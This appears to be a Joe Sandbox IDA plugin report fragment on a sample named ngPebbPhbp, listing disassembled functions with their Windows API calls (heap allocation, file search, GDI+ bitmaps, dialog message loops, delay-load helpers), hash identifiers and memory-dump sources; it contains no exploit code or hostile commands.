                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: d3829a019965efe2c2213293668e43e0480c35bf9bf1799d4ded068ecb45c712
                                                • Instruction ID: 14b879ecfa037427a4417f31af30ab643b013eeecde53c237f1c6438f7f04945
                                                • Opcode Fuzzy Hash: d3829a019965efe2c2213293668e43e0480c35bf9bf1799d4ded068ecb45c712
                                                • Instruction Fuzzy Hash: 45216F71900218DEDF18EFA4E885EDE7BF9EF48300F5401AAE109E72A1DB359A45CB65
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: f43a4061a8e025a0d144812a71714a97577523fe3e13b9d8efaa848aa49f0c00
                                                • Instruction ID: 1ff11e25f94873dc5e910a4ceff72672155d2c796c28b6462c6a50c51151f8b8
                                                • Opcode Fuzzy Hash: f43a4061a8e025a0d144812a71714a97577523fe3e13b9d8efaa848aa49f0c00
                                                • Instruction Fuzzy Hash: 0D016DB1841218EEDB00EBE4D886ADE7BF8AF14314F4444A5F505A6182C7389B89CB71
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c28cee5776741015569418dd2858f4ab74fe8efd64d80c4ecd7b665edd92a099
                                                • Instruction ID: e097ae29fe3417d823a63f435c21a9a0ef09cfee108ae56777bf3a3e4073774f
                                                • Opcode Fuzzy Hash: c28cee5776741015569418dd2858f4ab74fe8efd64d80c4ecd7b665edd92a099
                                                • Instruction Fuzzy Hash: 50E0653116122196DA6136A59D31B5B3AF8DF413A0F3941E1FE5CA7291DF61CE0085A5
                                                APIs
                                                  • Part of subcall function 00B0F826: __EH_prolog3_GS.LIBCMT ref: 00B0F830
                                                  • Part of subcall function 00B0F826: FindFirstFileW.KERNELBASE(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F859
                                                  • Part of subcall function 00B0F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F8A4
                                                  • Part of subcall function 00B0F826: GetLastError.KERNEL32(?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F902
                                                • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?,?,?,?), ref: 00B0F739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                • String ID:
                                                • API String ID: 765066492-0
                                                • Opcode ID: 5b1c95265aba80fc70ca0c8fb6e5625617fe0cae205d63e17418b194d2b34e5d
                                                • Instruction ID: c911f3e995b0eafd7951a95fabb52adba279843603d0adf7680257458adffca0
                                                • Opcode Fuzzy Hash: 5b1c95265aba80fc70ca0c8fb6e5625617fe0cae205d63e17418b194d2b34e5d
                                                • Instruction Fuzzy Hash: D3F0A73100D791AECE311BA44804A9B7FD1AF16370F104F99F0F9125D2C270D4549B23
                                                APIs
                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00B1742D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExecutionStateThread
                                                • String ID:
                                                • API String ID: 2211380416-0
                                                • Opcode ID: 8d2ecb407d8997025271ce9e75d77ba75d0047a812cd999b61ba3acefabfad61
                                                • Instruction ID: 02f05b230eac86582d8a2bc616cab0a1ae28dd3db89ca87001644a31e928b585
                                                • Opcode Fuzzy Hash: 8d2ecb407d8997025271ce9e75d77ba75d0047a812cd999b61ba3acefabfad61
                                                • Instruction Fuzzy Hash: 1ED05B1174905066FA253B2568877FD1DD6AFC6315F4900F6B019673C3CE944CC693E6
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00B01206
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 118556049-0
                                                • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                • Instruction ID: 800daeccf5180175ba7eff009ba9d39571cb1b4f4fb8fb2fe9ff962171c2e575
                                                • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                • Instruction Fuzzy Hash: 50D05EB66026024FC72EEF3CD96682E7AD49F503053104AADF02BCA6C2DF31CC25C615
                                                APIs
                                                • GdipAlloc.GDIPLUS(00000010), ref: 00B1EB0C
                                                  • Part of subcall function 00B1E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B1E86A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                • String ID:
                                                • API String ID: 1915507550-0
                                                • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                • Instruction ID: bae64452ed50c35e32526bb72612f085ee65ae465dac1a0bfe427603eac338f7
                                                • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                • Instruction Fuzzy Hash: 7CD0A73020420AB6DF012B208C429BF75D4DF00340F848161BC1685150EA70E9505260
                                                APIs
                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B24256
                                                  • Part of subcall function 00B20678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                  • Part of subcall function 00B20678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                  • Part of subcall function 00B20678: IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
                                                  • Part of subcall function 00B20678: TranslateMessage.USER32(?), ref: 00B206BC
                                                  • Part of subcall function 00B20678: DispatchMessageW.USER32(?), ref: 00B206C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                • String ID:
                                                • API String ID: 897784432-0
                                                • Opcode ID: e9aa7292cf46e5ccbd1f1163a669b21624cc4390a999d11a16a0840ca21e1c6e
                                                • Instruction ID: cfc79df114391ff956e0e378ad2f6797efb6a10b9161795bc33ee0e037bc6795
                                                • Opcode Fuzzy Hash: e9aa7292cf46e5ccbd1f1163a669b21624cc4390a999d11a16a0840ca21e1c6e
                                                • Instruction Fuzzy Hash: 87D09E31144300AAD6122B51DE0AF1A7AE2EB9CB05F4045D4B349750F1CA629E319B12
                                                APIs
                                                  • Part of subcall function 00B24DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00B24DF2
                                                • DloadProtectSection.DELAYIMP ref: 00B24D54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AcquireDloadExclusiveLockProtectSection
                                                • String ID:
                                                • API String ID: 3680172570-0
                                                • Opcode ID: c2db617e82d0c6730e9fd4475575cee626c31234cc1186ae215a576f8db04a5b
                                                • Instruction ID: 364434b31095065ffedcec3e62b902afd8df588c7b5a172e92de3ce30e96b689
                                                • Opcode Fuzzy Hash: c2db617e82d0c6730e9fd4475575cee626c31234cc1186ae215a576f8db04a5b
                                                • Instruction Fuzzy Hash: 64D0C9361046709ED765BB28BC9AB9822E0F304386B9105E1E25D869E4CF6058549601
                                                APIs
                                                • GetFileType.KERNELBASE(000000FF,00B0E052,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E15E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID:
                                                • API String ID: 3081899298-0
                                                • Opcode ID: 742a9d22dd07bac26bd417facbd3a9dbe83f4eef5b02617b2a0ed027703545ec
                                                • Instruction ID: 5f510a31712a8f431f92d9f406943bd24caab26e6d697dea5689545abc52c900
                                                • Opcode Fuzzy Hash: 742a9d22dd07bac26bd417facbd3a9dbe83f4eef5b02617b2a0ed027703545ec
                                                • Instruction Fuzzy Hash: 24C00239400249DACE254A28984949D7AA2EA523A67B49BD4D039AA5E1C732CC97EA11
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a550521674a351a784cc9731f1b9bbd32e707159d947ceb89ba6298f9cb3e5ac
                                                • Instruction ID: 79d0c49e5e8e054230b3586eda11f7ed28e890b4e5032307c94ef253289aa9fe
                                                • Opcode Fuzzy Hash: a550521674a351a784cc9731f1b9bbd32e707159d947ceb89ba6298f9cb3e5ac
                                                • Instruction Fuzzy Hash: 81B012863DD0206D320491147E02D3701CDC0C3B1173086DAF80CD1881EE804D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 08b2246b414463554a3625ef56238b4b4afedcec6afd6d63c60b98d9a7c0c16f
                                                • Instruction ID: 93e370babf8ff4f8026ca436c06b14a8beba30ab9438e76171e0e10e3eba5d8d
                                                • Opcode Fuzzy Hash: 08b2246b414463554a3625ef56238b4b4afedcec6afd6d63c60b98d9a7c0c16f
                                                • Instruction Fuzzy Hash: 9FB012963DC0206C3204A1147F02D3701CDC0C2B1133046DAF80CD1841FE814F891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a82b4aaa4ba113076e4f6096af3885bc5ee11c04f38356400f38564b26589425
                                                • Instruction ID: 7f686216669bd0c9765b630b2a50f0bd993f0668e4103768f6746986c8935155
                                                • Opcode Fuzzy Hash: a82b4aaa4ba113076e4f6096af3885bc5ee11c04f38356400f38564b26589425
                                                • Instruction Fuzzy Hash: 7DB012963DC1206C3344A1147E02D3701CDC0C2B1133047DAF40CD1841EE804EC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8204e1049611ef23f3c3b75b4f80f6fe54367474d6c548b439242091e08b37c9
                                                • Instruction ID: be60c8362a7c221d49f392a2816df36cf3485554122b9dc523bbfc00cf2808bd
                                                • Opcode Fuzzy Hash: 8204e1049611ef23f3c3b75b4f80f6fe54367474d6c548b439242091e08b37c9
                                                • Instruction Fuzzy Hash: 74B012863DC0206C320891747E02D3701CCC0C2B113308ADAF40CD1941EE804D8C1432
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: d71955a7b4336c28ea627609e801e6660be6c95753603a22027f49d4f8159b52
                                                • Instruction ID: a79f76e5c0319b9a9d30357ecc699734227334cd996491d0f9f0aaf2a3fdef1e
                                                • Opcode Fuzzy Hash: d71955a7b4336c28ea627609e801e6660be6c95753603a22027f49d4f8159b52
                                                • Instruction Fuzzy Hash: 43B012963DC1206C3204A1147E02D3701CDC0C3B1133086DAF80CD1841EE804E881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 1361ec6803cbd228efcee50fe83552acd2fb3bf215a5a5c750ef75e97972ed56
                                                • Instruction ID: 7c985ffa402c1929c76523fc7e88b46804cc5e1b40afb762f9559b124c95e7ca
                                                • Opcode Fuzzy Hash: 1361ec6803cbd228efcee50fe83552acd2fb3bf215a5a5c750ef75e97972ed56
                                                • Instruction Fuzzy Hash: 2DB012863ED0206D320491247E02D3701CEC4C2B1173046DAF40CD1841EE804D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 279732529fa6ac7939f5965b3bbe933cb46da3d47d57020b93d4c2158e948357
                                                • Instruction ID: e05799d888a03608d59c6d258c144d7ff41ce20b8588e59da15aba52b2a5df64
                                                • Opcode Fuzzy Hash: 279732529fa6ac7939f5965b3bbe933cb46da3d47d57020b93d4c2158e948357
                                                • Instruction Fuzzy Hash: DDB012963DD1206D334492147E02D3701CDC0C2B1173047DAF40CD1841EE804DC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: fee7524540d7f5b1caa4da7724d3a8c71aaff01e1e6951e9d1d8f0ba0310351c
                                                • Instruction ID: dd1d079df613b4ec1c374fe2ff45f9e08cba0ea7d32845d007154c1a391686fe
                                                • Opcode Fuzzy Hash: fee7524540d7f5b1caa4da7724d3a8c71aaff01e1e6951e9d1d8f0ba0310351c
                                                • Instruction Fuzzy Hash: 15B012863EC1206C32049124BE02D3B01DCC0C2B1133047DBF40CD1841EEC04D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
